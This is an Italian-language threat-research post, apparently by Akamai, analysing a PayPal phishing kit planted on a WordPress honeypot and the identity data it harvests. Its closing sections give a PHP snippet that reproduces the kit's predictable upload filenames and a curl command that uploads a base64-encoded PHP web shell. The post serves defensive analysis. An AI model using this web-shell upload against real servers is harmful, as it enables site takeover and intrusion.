Il kit che minaccia tutti i dati: lo scam imita le misure di sicurezza note di PayPal
Analisi riassuntiva
I ricercatori di Akamai hanno scoperto le prove di un criminale che ha violato i siti ufficiali di WordPress per eseguire una truffa di phishing completa tramite PayPal.
Il criminale ha utilizzato attacchi di forza bruta nei siti ufficiali di WordPress per inettare il proprio kit di phishing come forma di tecnica evasiva.
Il kit tenta di ottenere un accesso sostanziale alle identità e alle informazioni delle vittime imitando nuove pratiche di sicurezza, ossia richiedendo agli utenti di inviare documenti e fotografie personali, oltre ai propri dati bancari e alle password della posta elettronica.
Questo livello insolitamente completo di furto di identità delle vittime potrebbe essere utilizzato, tra l'altro, per riciclare denaro, evadere le tasse o nascondere altri crimini informatici.
Il furto delle identità ha colpito 42 milioni di persone nel 2021, con perdite totali pari a 52 miliardi di dollari.
Il kit impiega varie tecniche di social engineering per ingannare le vittime e indurle a fornire informazioni sempre più sensibili.
Uno degli aspetti unici di questo kit di phishing è rappresentato dai suoi tentativi di eludere direttamente le società che si occupano sicurezza fornendo vari controlli sull'indirizzo IP di connessione per garantire che non corrisponda a domini specifici o provenga da organizzazioni che operano nel settore della sicurezza.
Il criminale che si nasconde dietro questo sito utilizza un plug-in di gestione dei file per caricare il kit di phishing. È interessante notare come tramite questo meccanismo sia possibile sfruttare ulteriormente il sito di WordPress.
L'autore del kit di phishing utilizza htaccess per riscrivere gli URL in modo che non presentino .php alla fine, il che conferisce alla pagina di phishing un aspetto più raffinato e professionale.
Introduzione
Il phishing è uno dei metodi più comuni per sferrare truffe e attacchi informatici. Quasi il 50% di tutti i cittadini degli Stati Uniti è stato colpito da furti di identità tra il 2020 e il 2022, probabilmente a causa della miriade di progressi altamente tecnici che i criminali hanno compiuto in questo campo. Nonostante la crescente consapevolezza delle truffe online e delle tecniche di social engineering, come quelle illustrate di seguito, queste cifre continuano ad aumentare. Nel 2021, sono stati segnalati danni per ben 52 miliardi di dollari a causa di furti di identità, il che evidenzia l'impatto che queste truffe hanno sulla vita quotidiana delle persone.
Sono state introdotte diverse innovazioni nel modo in cui il phishing appare e viene percepito per farlo sembrare più legittimo rispetto alla classica truffa alla nigeriana. Ne abbiamo riscontrato un esempio esaminando di buon mattino un honeypot di WordPress: un sito truffa PayPal ha rivelato un file in formato .zip. Il file, denominato paypal_crax_original.zip quando non è compresso, contiene più di 150 file che vanno dal codice sorgente PHP ai file dei font.
Oltre alle tipiche informazioni delle carte di credito o alla raccolta di credenziali che vengono visualizzate su queste pagine di accesso false, questa truffa mira al furto totale delle identità con un metodo fornito dalle stesse vittime. In questo blog, esamineremo questo attacco da cima a fondo: come finisce nell'honeypot, come sfugge al rilevamento e, cosa più importante, come raccoglie le informazioni personali.
Vettore di infezione
Innanzitutto, il campione è arrivato sul nostro honeypot indovinando o forzando brutalmente le credenziali amministrative di WordPress che abbiamo impostato. Il kit utilizza un elenco di abbinamenti di credenziali/password comuni trovati su Internet per accedere. Il nostro honeypot è una semplice configurazione di WordPress che consente deliberatamente di violare i sistemi sfruttando plug-in vulnerabili o credenziali di accesso amministrative deboli. In questo modo, il criminale "sfrutta" altri siti di WordPress e li utilizza come host ottenendo le credenziali e installando un plug-in di gestione dei file che ha utilizzato per caricare il kit di phishing. Possiamo vedere questi passaggi nei registri seguenti (Figure 1 e 2).
Figura 1. Installazione del plug-in wp-file-manager
Figura 2. Elenco dei file paypal_crax_original.zip
Reputazione e verifica dell'IP di connessione
Uno degli aspetti unici di questo kit di phishing è rappresentato dai suoi tentativi di eludere il rilevamento con riferimenti incrociati agli indirizzi IP corrispondenti a domini specifici. In tal modo, il kit di phishing fornisce vari controlli sull'indirizzo IP di connessione per garantire che non corrisponda a domini specifici o provenga da organizzazioni che operano nel settore della sicurezza (Figura 3). Questa operazione viene eseguita confrontando l'indirizzo IP di connessione con un elenco di intervalli IP statici e domini codificati nei suoi file di origine. Questi intervalli IP sono i blocchi di rete di aziende come Google, Microsoft, Sucuri, ecc. Inoltre, viene controllato l'indirizzo IP rispetto a un sito di reputazione IP tramite una chiave API incorporata nel codice, che cerca eventuali IP segnalati come dannosi.
(Fig. 3) Elenco parziale dei domini controllati dal kit di phishing
Aspetto del sito di phishing
Uno degli aspetti più sconvolgenti del kit è la sua interfaccia immacolata, fino all'URL. L'autore del kit di phishing utilizza htaccess per riscrivere gli URL in modo che non presentino .php alla fine (Figura 4) per far sembrare il sito più un'applicazione RESTful raffinata. Un sito appare più raffinato e professionale se i collegamenti vengono visualizzati come http://site/app/login anziché http://site/app/login.php e un aspetto professionale è più credibile.
Figura 4. Regola del server Apache HTTP per la riscrittura degli URL
Raccolta dei dati
Innanzitutto, alla vittima viene presentata una sfida di sicurezza captcha (Figura 5). Questo comportamento è importante per far sembrare la pagina di accesso PayPal legittima perché gli utenti sono abituati ad effettuare diversi passaggi di sicurezza quando accedono ovunque, in particolare a un sito finanziario.
Figura 5. La sfida captcha
Una volta superata la sfida captcha iniziale (verificando la corrispondenza di ciò che è stato inserito), alla vittima viene richiesto di inserire il suo indirizzo e-mail e la password (Figure 6 e 7).
Figura 6. Il prompt dell'indirizzo e-mail
Figura 7. Il prompt della password
Tuttavia, questo kit supera l'intento della maggior parte degli attacchi di phishing, sottrando ancora più informazioni, come vedrete di seguito. Il kit, infatti, tenta di guadagnare la fiducia della vittima affermando che si è verificata un'attività insolita sul suo conto, che non è ciò che ci si aspetta durante il phishing (Figura 8).
Figura 8. Tentativo di guadagnare la fiducia della vittima sostenendo che si è verificata un'attività insolita
Il passaggio successivo, ovviamente, è verificare il numero della carta di credito. Sebbene un codice postale o un numero CCV siano normalmente sufficiente per la conferma, questo kit richiede alla vittima tutti i dati della sua carta di credito (Figura 9). A questo punto, i criminali sono andati ben oltre il loro intento. Quindi, perché smettere di raccogliere le informazioni personali della vittima proprio ora? E infatti, come vedrete di seguito, non si fermano qui.
Figura 9. Invio di tutti i dati della carta di credito
È qui che la cosa si fa davvero interessante. Al prompt successivo, viene richiesto il numero di identificazione personale (PIN) del bancomat, il numero di previdenza sociale e il nome da nubile della madre (Figura 10). Queste informazioni vanno ben oltre ciò che viene solitamente raccolto da un tipico kit di phishing.
Figura 10. Tentativo di raccogliere informazioni più sensibili
Perché non collegare un indirizzo email al conto PayPal? In tal modo, si fornisce al criminale un token di accesso a qualsiasi account di posta elettronica che la vittima abbia scelto di collegare. Come potete vedere di seguito, il criminale ha utilizzato un esempio di e-mail creata per mostrare le credenziali (Figura 11). Dopo ulteriori indagini, il sito Gamad.com è stato messo offline e risulta non disponibile da qualche tempo. Presumo che il sito sia stato configurato per raccogliere credenziali o un servizio legittimo che è stato violato.
Figura 11. Collegamento all'account di posta elettronica
A questo punto, il criminale è entrato in possesso delle credenziali, dei dati completi sulla carta di credito, del numero di previdenza sociale e di molto altro, eppure il suo compito non è ancora finito.
Le schermate successive raccolgono i documenti d'identità e richiedono una foto per convalidare l'identità della vittima (Figure 12 e 13). Questa è una tecnica di sicurezza più recente utilizzata da enti come l'IRS, che potrebbe far guadagnare ulteriormente la fiducia della vittima. Nonostante il kit non abbia accesso alla fotocamera per scattare una foto (come si vede tipicamente negli usi legittimi di questa tecnica di verifica), ciò potrebbe in realtà creare ancora maggiore fiducia nella vittima poiché potrebbe sembrare una prova di legittimità in quanto le organizzazioni che utilizzano queste tecniche spesso dispongono di programmi di sicurezza piuttosto sofisticati.
Figura 12. Caricamento dei documenti d'identità
Figura 13. Caricamento di un documento d'identità con una foto
Caricare i documenti d'identità e scattare una foto per verificarli è una situazione completamente nuova per una vittima che semplicemente perdere i dati della carta di credito: questo metodo, infatti, potrebbe essere utilizzato per creare conti di trading di criptovalute con il nome della vittima e, successivamente, per riciclare denaro, evadere le tasse o nascondere altri crimini informatici.
A questo punto, la vittima ha fornito praticamente ogni tipo di informazione sensibile necessaria per attuare un furto di identità completo (Figura 14).
Figura 14. Altra schermata visualizzata per infondere un falso senso di sicurezza nella vittima
Sfruttamento del caricamento di file
È interessante notare che la funzione di caricamento dei file contiene anche una vulnerabilità che potrebbe consentire a un altro criminale di caricare una web shell e assumere il controllo del sito infetto. Il nome del file viene creato tramite un md5sum di un indicatore di data/ora. Sebbene l'indicatore di data/ora utilizzato sia accurato al millisecondo, può fornire al criminale un keyspace di md5sum ricercabile da controllare quando cerca il nome file della web shell che ha caricato.
Il codice di creazione del file utilizza la data e l'ora con i secondi trascorsi dall'epoca UNIX per generare un md5sum per un nome file, che ci fornisce un keyspace ricercabile per tutta la durata di caricamento del nostro file. È possibile usare la funzione modificata dal codice originale qui sotto per creare una tabella arcobaleno di hash md5, quindi controllare ciascuno di essi con una richiesta GET per una risposta 200.
<?php
$t=microtime(true);
$micro=sprintf("%06d",($t - floor($t))* 1000000);
$today=date("m.d.y.h.i.s.U".$micro,$t);
$name=hash('md5',$today);
echo $today,"->",$name ;
?>
$ php time.php
Timestamp :06.24.22.09.40.31.1656078031551004 md5sum :1b0d96dbd15a1885b905c0bdb8c1e9bc
La stringa creata per il md5sum è composta da una data, un'epoca e da microsecondi. Possiamo creare questa stringa utilizzando la funzione bash expr `date +%s%N` / 1000, quindi concatenarla alla data e all'ora fino al secondo. Possiamo quindi generare tutti gli incrementi di tempo tra il momento in cui il file è stato caricato per la prima volta sul server e il momento in cui il caricamento è stato completato. In realtà, l'ho testato, ma man mano che la latenza della rete aumenta, anche il keyspace si moltiplica. Ogni secondo ha un milione di possibili nomi di file md5sum in base ai microsecondi. Si tratta di un keyspace relativamente piccolo se passano solo pochi secondi dal momento in cui il caricamento del file inizia al momento in cui viene completato. È qualcosa che potremmo forzare brutalmente se avessimo abbastanza tempo.
Sfruttamento
È possibile utilizzare un semplice script curl per caricare una piccola web shell con codifica base64 una volta trovato il nome file.
$ curl -d 'doc_type=Passport&images%5B%5D=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgcGFzc3RocnUoJF9HRVRbJ2knXSk7ID8+%2BCg%3D%3D' -v http://example/tmp/extra/stockers/step7.php
Conclusione
Guardando questo kit dall'esterno, può sembrare ovvio che non sia legittimo. Se recentemente avete visitato il sito di PayPal, sapreste che questa pagina non è vera: PayPal si collega direttamente sia alle carte di credito che alle informazioni bancarie, utilizza una password monouso per l'accesso e non richiede mai il PIN del bancomat. Tuttavia, l’elemento di social engineering è ciò che permette la riuscita di questo kit.
Al giorno d'oggi, le persone giudicano brand e aziende in base alle loro misure di sicurezza. Non solo è un luogo comune verificare la propria identità in vari modi, ma è anche un'aspettativa quando si accede a siti con informazioni ultrasensibili, come società finanziarie o sanitarie.
Utilizzando immediatamente il captcha, comunicando alla vittima che si è verificata un'attività insolita sul suo conto e rafforzando la sua fiducia con "nuove misure di sicurezza" come un documento d'identità, si ingenera nella vittima la sensazione di trovarsi in uno scenario legittimo. Gli stessi metodi che possono garantire la sicurezza di un'identità possono alla fine portare al furto totale di identità: non solo i numeri delle carte di credito, ma i conti in criptovalute e tutto ciò che il criminale voglia ottenere.
I criminali progrediscono come le misure di sicurezza e anche come la quantità di informazioni personali che possono raccogliere. Con la costante diffusione delle questioni di sicurezza sui media e nei posti di lavoro, le persone sono ora più consapevoli di quanto lo siano mai state, il che aumenta la posta in gioco per i criminali in cerca di profitti.